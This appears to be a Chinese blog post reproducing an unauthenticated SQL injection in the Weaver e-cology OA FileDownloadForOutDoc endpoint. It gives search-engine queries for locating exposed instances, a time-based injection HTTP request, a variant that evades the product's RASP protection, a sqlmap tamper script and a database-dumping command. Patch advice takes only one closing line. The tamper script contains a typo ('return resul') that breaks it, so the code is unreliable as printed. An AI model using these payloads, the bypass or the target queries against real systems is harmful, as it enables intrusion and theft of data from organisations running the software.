泛微E-cology FileDownloadForOutDoc SQL注入漏洞(CVE-2023-15672)

漏洞简介

泛微e-cology未对用户的输入进行有效的过滤,直接将其拼接进了SQL查询语句中,导致系统出现SQL注入漏洞。远程未授权攻击者可利用此漏洞获取敏感信息,进一步利用可能获取目标系统权限等。

影响版本

Ecology 9.x 补丁版本 < 10.58.0;Ecology 8.x 补丁版本 < 10.58.0

漏洞复现

fofa查询语法:app="泛微-协同办公OA"
鹰图查询语法:app.name="泛微 e-cology 9.0 OA"
登录页面如下:

POC:

POST /weaver/weaver.file.FileDownloadForOutDoc HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36
Content-Length: 45
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Connection: close

fileid=123+WAITFOR+DELAY+'0:0:15'&isFromOutImg=1


因泛微 OA 启用了 RASP,同一个执行语句第二次注入就会被拦截,因此需要不断修改请求包。给出绕过的请求包:

POST /weaver/weaver.file.FileDownloadForOutDoc HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36
Content-Length: 45
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Connection: close

fileid={random}+WAITFOR+DELAY+'0:0:5'&isFromOutImg=1

加载tamper脚本进行注入

import os,re,random
from lib.core.enums import PRIORITY
from lib.core.common import singleTimeWarnMessage
from lib.core.enums import DBMS

priority = PRIORITY.HIGHEST

def tamper(payload, **kwargs):
	result = ""
	num = random.randint(1,2**27)
	result = str(num)+payload
	return resul

尝试注入:
python3 sqlmap.py -r post.txt --tamper=ecology_sql_random.py --batch --dbs

漏洞修复

目前官方已发布安全补丁,建议受影响用户尽快将补丁版本升级至10.58及以上。
https://www.weaver.com.cn/cs/securityDownload.asp#

posted @ 2023-09-04 15:40  学安全的小白  阅读(2459)  评论(0编辑  收藏  举报